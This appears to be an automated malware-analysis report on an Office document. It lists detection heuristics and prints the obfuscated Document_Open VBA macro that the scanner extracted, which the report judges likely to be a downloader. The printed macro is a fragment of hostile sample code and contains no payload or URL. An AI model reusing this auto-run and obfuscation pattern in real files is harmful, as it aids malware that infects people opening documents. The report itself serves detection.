Malware Insights
The sample is an OLE document containing a VBA macro named 'Document_Open'. This macro is designed to execute automatically when the document is opened, indicating a malicious intent to run arbitrary code. The macro's code is heavily obfuscated with numerous variables and conditional statements, but its primary function appears to be the execution of a subroutine that likely downloads and executes a secondary payload. The presence of the 'Document_Open' macro and the obfuscated code strongly suggests a downloader or droppper functionality.
Heuristics 4
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 71,045 bytes but its declared streams total only 36,254 bytes — 34,791 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1503 bytes |
SHA-256: 1121ab8e6b83b50d6e749c0dc1087d63fbff63fd95040517eb0d8b5fea3e7e05 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VJuVDSDBMdjuRq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If WwPbF > NsIiH Then Dim WdSzS() AVLlf = XFvdS + fvYivl + RsXXSA + KjKqYR End If If FGtkTF And zRkaZ Then Dim Mjnih() AOdwt = nzrvEE + HlqRp RjNsF = rapwwX + rGafc End If If MKnMiw Or jdtKB Then Dim BzwIpw() jHlYr = lliMi + YBlIod fTkUr = YQKmXc + PsPFZ + UdNhw + PYcjQ End If If cnvsk Or SHXjzS Then Dim zoZtzE() fQEzY = zZwWz + Tcpzdn + zlGZz + mVluL End If If tvIMr And EXkIa Then Dim mXOTVP() zZAdat = kIizh + iOrPA SmZjCY = NzfLF + jilrtR End If If fFMENf < SQWSw Then Dim PinVX() CLwBv = vMthF + JpLlb + osHSI + ciZlc nKFwwn = EQjRSf + KIIJLd + mjiDj + ZZRzJ End If If fYRmv Xor ucSoaw Then Dim jYWjm() jZImSm = EcXwku + NzjwGU + fmBpm + njqCvu IkWmwz = iREWE + DzmrXa + MEmGw + DwXlUA End If pGdNiCidOJfqlc (ZizEF + TVzuP + uzpHONp + AoHOvTmv + wDKKEl + MTSwznIis + poLPU + QforOMDJhR + ibmiPvCUqY + nLKuEG + dauzGLlN + lFfquwf) If nlzsn < SXuhk Then Dim HOqOwD() VszOSo = KLHAM + fVEYII End If If fsYCit <> 1 Then Dim qAnhmB() rKGAJG = msJkt + iftmVo End If If YEzQqT Xor KKjjWO Then Dim QTLzY() HbqEb = aYHcn + fNkijK jJAaj = IXhOXj + GAUzN End If End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.